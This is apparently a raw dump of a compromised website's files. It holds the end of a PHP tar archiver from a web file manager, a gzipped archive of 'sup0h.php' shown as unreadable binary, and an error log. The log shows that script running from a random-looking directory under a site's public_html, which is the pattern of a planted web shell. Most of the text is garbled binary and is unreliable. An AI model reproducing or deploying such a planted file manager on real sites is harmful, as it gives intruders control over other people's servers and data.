__('Cannot write to file').' '.$header['filename']; return false; } else { $decr = floor($header['size']/512); for ($i = 0; $i < $decr; $i++) { $content = $this->readBlock(); fwrite($destination, $content, 512); } if (($header['size'] % 512) != 0) { $content = $this->readBlock(); fwrite($destination, $content, ($header['size'] % 512)); } fclose($destination); touch($header['filename'], $header['time']); } clearstatcache(); if (filesize($header['filename']) != $header['size']) { $this->errors[] = __('Size of file').' '.$header['filename'].' '.__('is incorrect'); return false; } } if (($file_dir = dirname($header['filename'])) == $header['filename']) $file_dir = ''; if ((substr($header['filename'], 0, 1) == '/') && ($file_dir == '')) $file_dir = '/'; $this->dirs[] = $file_dir; $this->files[] = $header['filename']; } return true; } function dirCheck($dir){ $parent_dir = dirname($dir); if ((@is_dir($dir)) or ($dir == '')) return true; if (($parent_dir != $dir) and ($parent_dir != '') and (!$this->dirCheck($parent_dir))) return false; if (!mkdir($dir, 0777)){ $this->errors[] = __('Cannot create directory').' '.$dir; return false; } return true; } function readHeader($binaryData, &$header){ if (strlen($binaryData)==0){ $header['filename'] = ''; return true; } if (strlen($binaryData) != 512){ $header['filename'] = ''; $this->__('Invalid block size').': '.strlen($binaryData); return false; } $checksum = 0; for ($i = 0; $i < 148; $i++) $checksum+=ord(substr($binaryData, $i, 1)); for ($i = 148; $i < 156; $i++) $checksum += ord(' '); for ($i = 156; $i < 512; $i++) $checksum+=ord(substr($binaryData, $i, 1)); $unpack_data = unpack('a100filename/a8mode/a8user_id/a8group_id/a12size/a12time/a8checksum/a1typeflag/a100link/a6magic/a2version/a32uname/a32gname/a8devmajor/a8devminor', $binaryData); $header['checksum'] = OctDec(trim($unpack_data['checksum'])); if ($header['checksum'] != $checksum){ $header['filename'] = ''; if (($checksum == 256) && ($header['checksum'] == 0)) return true; $this->errors[] = __('Error checksum for file ').$unpack_data['filename']; return false; } if (($header['typeflag'] = $unpack_data['typeflag']) == '5') $header['size'] = 0; $header['filename'] = trim($unpack_data['filename']); $header['mode'] = OctDec(trim($unpack_data['mode'])); $header['user_id'] = OctDec(trim($unpack_data['user_id'])); $header['group_id'] = OctDec(trim($unpack_data['group_id'])); $header['size'] = OctDec(trim($unpack_data['size'])); $header['time'] = OctDec(trim($unpack_data['time'])); return true; } function writeHeader($filename, $keep_filename){ $packF = 'a100a8a8a8a12A12'; $packL = 'a1a100a6a2a32a32a8a8a155a12'; if (strlen($keep_filename)<=0) $keep_filename = $filename; $filename_ready = $this->makeGoodPath($keep_filename); if (strlen($filename_ready) > 99){ //write long header $dataFirst = pack($packF, '././LongLink', 0, 0, 0, sprintf('%11s ', DecOct(strlen($filename_ready))), 0); $dataLast = pack($packL, 'L', '', '', '', '', '', '', '', '', ''); // Calculate the checksum $checksum = 0; // First part of the header for ($i = 0; $i < 148; $i++) $checksum += ord(substr($dataFirst, $i, 1)); // Ignore the checksum value and replace it by ' ' (space) for ($i = 148; $i < 156; $i++) $checksum += ord(' '); // Last part of the header for ($i = 156, $j=0; $i < 512; $i++, $j++) $checksum += ord(substr($dataLast, $j, 1)); // Write the first 148 bytes of the header in the archive $this->writeBlock($dataFirst, 148); // Write the calculated checksum $checksum = sprintf('%6s ', DecOct($checksum)); $binaryData = pack('a8', $checksum); $this->writeBlock($binaryData, 8); // Write the last 356 bytes of the header in the archive $this->writeBlock($dataLast, 356); $tmp_filename = $this->makeGoodPath($filename_ready); $i = 0; while (($buffer = substr($tmp_filename, (($i++)*512), 512)) != ''){ $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); } return true; } $file_info = stat($filename); if (@is_dir($filename)){ $typeflag = '5'; $size = sprintf('%11s ', DecOct(0)); } else { $typeflag = ''; clearstatcache(); $size = sprintf('%11s ', DecOct(filesize($filename))); } $dataFirst = pack($packF, $filename_ready, sprintf('%6s ', DecOct(fileperms($filename))), sprintf('%6s ', DecOct($file_info[4])), sprintf('%6s ', DecOct($file_info[5])), $size, sprintf('%11s', DecOct(filemtime($filename)))); $dataLast = pack($packL, $typeflag, '', '', '', '', '', '', '', '', ''); $checksum = 0; for ($i = 0; $i < 148; $i++) $checksum += ord(substr($dataFirst, $i, 1)); for ($i = 148; $i < 156; $i++) $checksum += ord(' '); for ($i = 156, $j = 0; $i < 512; $i++, $j++) $checksum += ord(substr($dataLast, $j, 1)); $this->writeBlock($dataFirst, 148); $checksum = sprintf('%6s ', DecOct($checksum)); $binaryData = pack('a8', $checksum); $this->writeBlock($binaryData, 8); $this->writeBlock($dataLast, 356); return true; } function openWrite(){ if ($this->isGzipped) $this->tmp_file = gzopen($this->archive_name, 'wb9f'); else $this->tmp_file = fopen($this->archive_name, 'wb'); if (!($this->tmp_file)){ $this->errors[] = __('Cannot write to file').' '.$this->archive_name; return false; } return true; } function readBlock(){ if (is_resource($this->tmp_file)){ if ($this->isGzipped) $block = gzread($this->tmp_file, 512); else $block = fread($this->tmp_file, 512); } else $block = ''; return $block; } function writeBlock($data, $length = 0){ if (is_resource($this->tmp_file)){ if ($length === 0){ if ($this->isGzipped) gzputs($this->tmp_file, $data); else fputs($this->tmp_file, $data); } else { if ($this->isGzipped) gzputs($this->tmp_file, $data, $length); else fputs($this->tmp_file, $data, $length); } } } function closeTmpFile(){ if (is_resource($this->tmp_file)){ if ($this->isGzipped) gzclose($this->tmp_file); else fclose($this->tmp_file); $this->tmp_file = 0; } } function makeGoodPath($path){ if (strlen($path)>0){ $path = str_replace('\\', '/', $path); $partPath = explode('/', $path); $els = count($partPath)-1; for ($i = $els; $i>=0; $i--){ if ($partPath[$i] == '.'){ // Ignore this directory } elseif ($partPath[$i] == '..'){ $i--; } elseif (($partPath[$i] == '') and ($i!=$els) and ($i!=0)){ } else $result = $partPath[$i].($i!=$els ? '/'.$result : ''); } } else $result = ''; return $result; } } ?> sup0h.php.php.tar.gz000064400000060672151032666610010327 0ustar00ْȒ(v_PTL6JS\ڀ\8Fe#5TѲX<,_^^3>l9 -M!k@ʜ7Wα%x m ?u@ȣ! uxD[0*ƣ0W/ʰANpv Wp 7ㆩpc4oJ~iR`_VUu4 `zNcx)^4{՜0413ԕ^rP"$',^GS[Pu L /)^G׀EsG1Lz7$҈ZER*~ɑ;|%w9YCE }wT|xP<9E.'/9Ne蟱YϝӦb]/\k>;!|b")rn|?ej c_9Yv3>x DHK`iu,HXpą"B Mr/bUN@.p1ht<`,c-]w8KrP*T$vQ"RPȸ6W|3}ƒ4 0r.bN&y筗L>J&R¹iEE IrP"bt[,^1&'Ҁgc\b )t+,ˋi5y8)WdG]uZ] kD+L+g%?D¤5a`0+?v`׀M`ApЀ 4`/RXv`K+0p[KV]Ӣd6JV56l@Ru8-?NnS6 eQ=9NS1q3 5v!қ"~7ބӛteEj7s RDzjY{J{xGYy- eHB[4b3KnD fgS*<aZ)(E%~KK `8E-p_EhqB+,3vp8!Bkoa&Վ'im/hi/JB9F]z-/w)59THv6mx#ըpccs*t-fPi.M>2.MS3Hڢgl]Ĩ0M5r)USϔYoUe8MC4X;L:P/6w f0[%-h.;o~9v=m Z^N R뱼% ,/PNlØ;^q@@a,L4 EiS$HOFA"6H i :T" 5n$.@I=lg0S5&/罐jgS㴵z{T}ZӇ;y V\rd GQN'+I4 U$@QEˆvE>&`Ի S)eҿ٪(Oͺp794x~;py^~Dknn{XݍH_C5D4>mYܺ懟d:·b|OuMd 4֤q PY X>h13ۜkh&Ʉ]7F2@{$S LDٍ=uٺ EɀޒYjAՔݘP.A=Ҽg|`g-xcc:}%NS"J 1ƜFiDSbט^ךt{I>Sv8nL#L~t|B5s&IhX7H>!m=?{Lrs=B[e,+ZEt 8:kK:?@c0.@sHtzɩ{9oQK>=)% cbmc:gNzX4]7.Tt0 ^ʣ 0ؤqH0hS:Ywes!%;5>hWiiOI.KfzpL%G cR[#"<O<+w^ho+ʻƷw7ǎ[Ȓ*#= @ՑW KŒ9D"T5GL@$vO8/:o4[u_aĢ`H['iI*r%((7mOoȦ`H4C"?u;!I̓ڜitQꚌ_R~ Js\'I\PLZ/#դfA'/`CmTkL1䞋V:lQm,UKr #<0LR[0LQ\*;~d,DGw|$P5ZLҪtRvr;T$2hGd2#s3~H31M b6/=b8гKi̝Hm;(ң1\Y '3bH˄=m^j/ LOJ+談EPֳXE ?]?)m7Ұ9gw<7:u!"GH]un= ꧋Z$0LNXNYʈpt FetLC+C"ꤊ:_W( hNl#DciD t['R/iү>NŽI.q`N;u5bPZq}rb$C1H㴠@ߟqQ7܏Ή GKZ3,{߮A`lԜsHxaHh4si P# Ppdc cirC{Gv^m<,Hd}@#87_+ˁ6N'KirG+t_*LSi=5UϤW.-xHFV;Jbe-E(qҨ<;%ՙ̢?Z<(6mhp(-COϹ`6Ze`^hmꪳq1 W(/m`k"Df5o.(SvwC|՜aan kC7^JGt*RCE_nS=On[^DDecqYxj)4.X`@7p",G ̞lkS?"C]MFX1ŲV?8 =uR%ߎ(8z;ra~\a=PqҔzS1g-(۲a8ZyƃdJ fG zFmY sC]==N+apV.Q~AÓgNG%Wca9aii]6=v$}Zi)*O*!sc.$.AwXfPKVKO~;F[FR}2]xe3IUAMxl醸FᭆLbxdPֹThtta~7lbU\o'_zֳVUK&.)mY.n]nٜstzaRv.9I_Єzm;fe%y-i_{c3}XӸo]N> Fqϱΐtѭ#dCWgJ: _r+44sY)p4Qn9. 6yj_ux7_ g'JBd}%x]/1]@ *ߧ<f_}N~,3 I'_/;K#m׽3g@0wAƽUE[ߏ 3 0UPY0`!J༂h yA!~f&G7>y@p!j2XeD+ x@*=[WT9Ilo fg@GR/{OCO1EWD?5.Oob5IxBG M Ֆ"r</, ;G/T1*1qi̴6G/덁פ5+@6a 5J7ALkT1q0p)=9t`z}`!lkVi=c.:} ''}4Y j`BHZH'C;VC1ۅ@8g&l%gL)9dD̑&i'*-u˞R-n*Fu?3GD`A*~0:q4Qҋ\$d%xcsZ0 e:Ҹra >Ybg`y<8m欔`+ٽ0Hf~Kb-8M[ޥ u3SbCYocfL.lFW!19it9c4B9 u>#F%s,1M{ (gJOx+b*yBAqșPO+$˕\_nt5n{̇#S_ ^0 Qcaj<7_D8e%km|w0CF`w0ԥ/ #mCyn!tuE)rp s^h 3a}r1I9Aht *>0` ~G%+r LasY}]fD:X:$q5ٕZ қS跖'@͏;XnPߢ-s(҅f8c֒͆c_beaT%tZd֒2Gu G m8;$"iA:ar/)Tzur&7x+m%ڙcB4-hu]]6cboqwc l_-GoٴE{\ ڊzNVCKUa-$X2I41T3UzխF0b %kN6(15^&L?p` -b-c$[BH젞=[3!=)ˎكҞM2 !ӈi @Ѡ$Ɋ\0jrh~2KYl>FL4dgZփ wˮwHZFxAq3Dp,KM "bz/;Hqe$VGF?4"(<w츸 r3/@4.Mf / GC'/1'<'ƣ8?f"~~ rߑ4w :In蔡4c 5 |dmF\!t Ʋf/.U_pM]D~r}ۯq/m% KlW42D)/lz\? N?a({c`ӳ,|1yДtRtLySBKVSXb$'ڱ3qaxߌ oߍo}<$\ 6'Hp7[r6B:GvSE%Ɨ۩ 3d-N`o8HE68XP8jsP`NΊz߮g?kzf~IeL L3mDTT{| _9_y0{f~=V4I? ̦}pxa4Z4xh6 b֢EX6cEB y\NW Qş8  ;F._Ì@ݎEnSA}#qYҴ~MLgF^+B"h^72L:L %:ǜe0~qXU[an5qX!W;~׽؍ygSpol=sȃPjlWŇ~/v*0NEk, mfXH9mӞcFfoUMyDy=5v&BZə|'fr)ϋ\:V Ϡ*ϵ5#a;NeRn3[iTzULvo|}]/JT.%m>S*E5|婜IeS&?[vU_T/K ykZST.K [@yEJB g|JKR3hQ遘uR\m{ST~Ķm*X4H2Rc'/ʙP)[ͥTjBL1^Sf-a<\s dx1(z2.=a0?v`8]S뭴Zt%N-L#xLZ W5V`VkQ%^`Bo]De yX{3CANrZcWE16iϓd4}X)*q<\w:/K ФvYE&1kqճ}Z=uMGm-݇V*RRlhR dDYOJa=zeURCQʤKJ:]`[BJOΰIEndZ4,IgP8 R#46\jTyJ7" ggm]N3tOg>5i 8&E9\iT1}ҍFqnTړ][^Na\L '4+`f_;Xط[vɮI 7 dS?w 9ޕ7RjmPUpR qO=>n^P NdD+},'(6K^ܳmI9ir#qkD!SFce;N}ʭ ެrVy Z712jǂi=suWʹ<%_XӇE1e_|K|+O}Ւ}L V)mujN%1Wm#>;\kkAYIp SM,m=^LLvftVa1yjӇ؈TDٯn M2vT*BjPJ?wrxPUNg҄e<(e:JW<;EY$yVu-jGOv_Vj˃@]>Dlo^+O["&jmzL𩯆&jVV~`z=*.XR= j"CMݟ‘&T*P6%,D{Vywvj=4KZc+q<"` HI=e93zj ↥_"DW\=ZnKhOR"hG1BgK@톢KO v;Oka:ZA>+z3pXrq9)ڽڬ Op0T 㤷@◕rl ׋.z:pJ`9,]P~lZ0yYVBp]<ӎr^~N8P::l,cbu*֗NS`WϽ^k`pKHmmZ Vؖ!+uԝy>幇v/wܲ<-e?*NֶHViq\ljF2G(V(saiUyՌ=|תj72yymFÊ/bV^9wg׍}G.V+Ng}5;yYu1;A=R)Ć^[+FbY-~)˝ԭr GnǏRxΗnz`i괢cſe҉r9Jtu2n~oO` L zUAj|oQRA>290 fxǦmrnQ~ V{.•hώ] $σrd\)UֱI*[+ >7~JQzڭNlXţjTjT^s"`BƚcD97l@VhWvO㼆0Nu,mjlj֓V(Q\SɄ=lZ}#xRx*A)9ŧTgz.>Y,XC}U/V#YcjbلGI'v-2.ͮfٸڬhO9{|~9^g5Q M#J-\Wߩb) ͉=G/f 4Uw$TnCzGBvKl~,ǝX[7TbEEw3Y.‰q$=R"ָj&+gdA{lFyt]=e no]on~uoG;A+)v jwZlwNuV=-$'BϣSK{5q1R[%:T%X"H.V'nQ6i v"WD^5THII4©\;c8pegZ6A!7v&ť\T+E y&Z.3Si11Uz\+4o/YZS(osDM㧎q`HÄ͇Cp"<"x\H/rC_-BotwnxivꕂGuyW*xyl%).ǨT¬Tq1źZCCd* zh26EyzH=h[ڏ}诶9J@dQ̎tDL2fN廩}!狝<ܗ#Graݳ'>J 'ӾdC)yN>aqEm*?/:1>Ag>rN".UUad=@( 'H1Ճ܋! GA J{[UA~VzH[FRge:*B8(B(Sl(FSҡNsQLWv l}kDeG3[Pw^??Ƭ`lcJ_fC\e bW=ʓetx4mDy>EĮ뛐t" F8H*5=Oi.>nֳ:Ń P"l&P.=*ԗRոzh*RuYxyf-<)G}">ć?b()eX~أDAO\ee94 vn`\pl<5"AA$ *Pn=(jʴRt&ҝ@Ikf@Z"[|lNNstDX6ӜWR$)W*̞X&X`+@L4YG/466gC5`~߯BB7ӏ ;bۈ X+ۥ|e(uZ]?=턅AIM+ru;?L&cO/U$R&\/!{*J>eПz&i+Mp|Zpl>y/i1 gHNLh3L ֭@W! %P/frΔ94zj JB*4k B 5-aYC\a ~?xX׳.V6u%-!H+Y^:ȩҁib}!Q1_K5۝jŤaGǨC%O޵vē6/wnlޱxQh_ d3=pX9Vڙo8UꞐU[I 8{~qf=WJB^WYU2!J^p}L^Eut|ZN?tM.]~/Hh;5)r9W]O[Rs4V#>|BrtBPD["J)Iqn1hBB ;N=F 1Z ]A"0z`0PgÈ Paf݅:!sOCGAp$[SPG5wL ֯YY< ^N ھ%PRjkQPp;4C>pcA -7[VK.{2x\t_[%ɝjKTJFmܹ򮠆f Kzo=4CnYJcRSqO߳qF ]J~<3[P /<m(YQD߉YF|ѲLYA$v y. ۏEPއQ4WYuKhא5v1l^H]WNIz$.z}3/e{p+X;t{mIǺ)E|*}{kJTWFM.Oߐߖ)G=eAo l#鞡 2j idP P#hg,KQl2E5adw}qʛ /?;=nf1ӽC47xp! X%͚*ţ SҢf2eŠ?al'[e nºpCuC{ACfCN*4ZSqs×7,+إ-H8ZQ 5 BF09$ڈk,\hЃ=%5k]2>rM>5msɖ&L4ATS Gǔ X HIlP!""dao'/qg#f8qu ˼:i H|M\ %)w`" {7jǍXKdCcJ 46n'A^*- uNn$'/z>B+\!S7X9}э{RTs,̀/Ώw tm(k l4=%|z4N" ʓnE[i2=z, c8$J*fWeO^+L<4| Gb0A9<.(_ P,`?I^w!tlN_YѮ#LK#`|;^Ͻ hH'q3ց9`'-8jw2C^pTJ㝞$'C 9d%<̀Mxtoӧ3KՍk yY6p0Abɐ8!Bup\0Bl!̱0c.JFX߉d6@HI$Rh a@*38ǩrYր&wa^rhIhcP@^^!cW,Zn@ 0[0B:H/Wx2ߊ5p5hqdƟ2N5ig׮sڈƏO{C`qhȗ(hD|10s=:147;tAt9쥹 G9Cp:ٞ|c>ƑL%cY̨߰I8z|M4Ux_Ϥ~D"S{ x/rN3FѸ{pqhSo| 6s:pk_q}d29U$$!xcP%"[]:BK~:K>ewvȀ | P˗SnT[ؓ*ck~"+L_dٸjrw+ !r9/bکsJE< 0:仓#zr~eSәig\lb}3H:{ao bNY[g:=^&(˂^Daa|zTmTQG8qYZւ8+"OO)ö]ڬ@l*!sL2 AiM g|#_#zCʁJ^vW$c~r~DAq=N>n~M|i/w8MW|vBu}6&wO:\Lu,8i p)"X4;#Z_Z ,k~o,hX*m0_ʃҗ{mئ_% OhН:LpՌ=ի_d 7ϲX\" 2-2o\[;(pΗF.~D>sx7JNoReV IzvuY6Jܛ,y1ǒ9ZЦI. faKm鲺Ɲ= E%F{k6;5NL߫*ac .{b} KG#)0A{ +NCh9 sJX"oBhDŽyn?l>e>ހC8mė>)ihk'7NԊn~rP\NZdH #[{vЭZW#pe?%k;J?IŧMza6!1o׵+9ۚݦ F^ ZߙGO%uҼ<屣iy."W)pB' M_gzY{ F8o?dkQa@ Jbnتq_ I|iB;F~̐{ |g,[Tc_ѿT~4>㿳3>^8rH :"qK<[Ȓ7?, yA|V}d9^([ 4B}呖qqr/Fu͵h_J9ާ`N/2Dk|^gy|q/2tNjlWY>B!;UkCN#H OjxzvK&V_ Vv@I˨XcQOoW۬=.>'C5<8OSyb)8Q,wfa9>LCJߛu gq`ePh5%w|Li:C3/R#mQ&,50!U"N|C2dG3O&s|qR 5Ö%3DA⋩0.RS_$c_aH"9L/ inua0`^0@;^'$>mONa Vm8AoBAVFևeQEBLQj.~q.zV DBM~/4d<" ç}5U&dNxQUxn'4bw Hڳ?"Ge~t.Z90/ br#:;>CR8-4s `l-)KJ2Bjl'aCdZ{[| k/EK,@]MvE!~}7Z20C!"JG>$ +䗓n=7('?&DjXwk%NLNH`DsUwc|Gߟ8FKY|$V_o0-?=cS{s[uFz%^t[pE;M@U' pu9z7p+ܪ /}Agy}1fÇSоxhҺAp<>,[=筮%j  id҇PAk$umpt;IEeʠ,u%>pӯ+ H #dsCT~TkFt{}n0TŅ$/W7G0 . p{yAypw }~P^"0GfCdh;1=]e!\yƙ{f$DT(`8!buw ҃w̐GǏLݹ.KM SD + ₇)J6o@"3m0A7NIPd(I@P-?jqE֓FRHOIAVH i! I27rOQY#DA`@((sϬ(A%dZQRZC~y3qE/㯤  HQB(&gW$WO6Z$)T!йO0U1lɘ/fϥrY %׊}KBA2(rҁPUS~7X"Qv[y<DG~50 7n}ېOV&l6r#GR6:ps- rLGsҕ@v4 R*cI?4 $e ++(Hҡb ul3}b-D-7 mQN%qMX_CmjmL[2hNcdu0[$$O>& 5!R2_>~A8Ҩ'Kirfb$"Z$>(~A:odftF2nS/rɇ̈gK cN\3%n#L8MV|55A#tg\f!r]ur<59Aڼǒ%31}0{ >Ŷߔ͗@ecgj/ڝ+ԩKuWf/!:zg tDS8su0HLwA|4{gfFF# v"x֐"/K*dn}PÅ ?a{C}6[޺:q+8n-RwlHȪ-QP  # epXQ:H~A(4#:|:2'n.t]L`^Ovq1~ʩzVA 3f仙kR 2F, ?@["Gv3:6n}66pgyƠfu2oGt{3̼X:ݺm: " ;ej\nL '4 s&rm"@++ t"HjATtq_D M{~i}{7|=XǼ uY(e"/EL Gc\ST Zrù!X%iL-t8 x.KmKwj;{g; &zcR=//s-naK3d۪ό.T,rMzgSvuZչfSS<`ߤ\ϲL= <-1\]TPG/^{e9urcja^fG׫^:-۪uWm_0݃*YdOZ34xiN_&>Nc0K/c.Ǔ0/ؗ` d3zN9,ɿ- ƊMN]+"E4rU#c%--%qY~:ya;w읦kӶά7 Cd|,n*XJdָepZt J7 /[t:bwWnKKaƻ4nI@F#Wmg"xnݓHǤmPXj$#mi|-|fIJPqQ_ |'W޷SǍ|?Qi.j֔meH4H{YvXϥnQs'l&\&+ؗ먎(KK=~`l%L 9psn0cs^rku=Yأo͘[.y]״/#M7.XiA }PH_|VdXn13QX+(0Xb]R@=ZXkstRffR(=77zW.3.ST'a]mҐ` %= \@w7?nr9},u͟ Cm˝F {1A}0Pɝsv7BoEfNY0EnB ܿ MQF”Y[atb&(ʲb'.XH2a>2MA̠姄3Ʃ.|KA)0c9u$~OԢ2Z=5-X<~τ{) HңEFkY؀bIbMeWEHr\ھ X =텾 ;J.潃F$,K  NضQs=WP}6mxnz X8Ӟ!6(_s}U~ @z1H7ikF'tG2GmL[g8wi^_=JƸ@;KSon^MV}sE^]Ye4Yn`ů wPrώ2ه2@IT: Խ7_YjCT=F+/cNJq_8\h/]; LjF0PJLJgP﷦V~B)u&?ߨo;`Pre*U$ΫݽgP׷<3' B$rAD\2Vno 3x{!33`=H`{!aY,Y GC4~A-eĶXn"KE@@ h]B.衱2wV Mտ*2Lk|eE @Ѕ&A^:ޙ-Ơu6[ 6nǔ¢3 p ,\mv[NjV 07z0K7WH}(|]n0 ?QBJ~gxDO,$Gp.75ԧ1gu:=NsDŽq؛w *"ѿ*dCPsL^U063'[{@={-'/p\zXZS 62۔3Bext^ [v-я{iC%,l.M }_.;zرп)lbFbPWsVzpS >,u;Y:|s{K"8ZϣU8xz;H->@D8r܇SwDڀ/n|3$:aA{M :1td\, 28~_TjrXKEf0>hqC]Hw5n8gt7h% {5Xª]]2߭zN7`F!}N &'u*koHd˶a'͍m=Zyz-vwg30_afkCkyw뼶oY! p h[wh1}{b(O?&R<error_log000064400000020774151032666610006501 0ustar00[05-Nov-2025 19:41:54 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [06-Nov-2025 02:36:26 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [06-Nov-2025 04:26:30 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [06-Nov-2025 05:38:55 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [06-Nov-2025 06:10:11 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [06-Nov-2025 06:10:43 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [06-Nov-2025 06:10:43 UTC] PHP Notice: Undefined variable: ext in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 1115 [06-Nov-2025 06:32:03 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [06-Nov-2025 07:09:16 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [06-Nov-2025 07:09:16 UTC] PHP Fatal error: Uncaught BadMethodCallException: phar "/home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php.php.tar.gz" exists and must be unlinked prior to conversion in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php:1115 Stack trace: #0 /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php(1115): PharData->compress(4096, 'php.tar.gz') #1 {main} thrown in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 1115 [06-Nov-2025 08:46:48 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [06-Nov-2025 08:46:51 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [06-Nov-2025 10:27:52 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [06-Nov-2025 10:56:10 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [06-Nov-2025 10:56:16 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [06-Nov-2025 10:57:13 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [06-Nov-2025 13:26:23 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [06-Nov-2025 13:26:30 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [06-Nov-2025 13:58:21 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [06-Nov-2025 14:56:26 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [06-Nov-2025 16:16:16 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [06-Nov-2025 17:25:56 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [06-Nov-2025 18:52:03 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [06-Nov-2025 20:24:18 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [06-Nov-2025 23:08:21 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [06-Nov-2025 23:59:22 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [07-Nov-2025 03:29:01 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [07-Nov-2025 03:53:07 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in 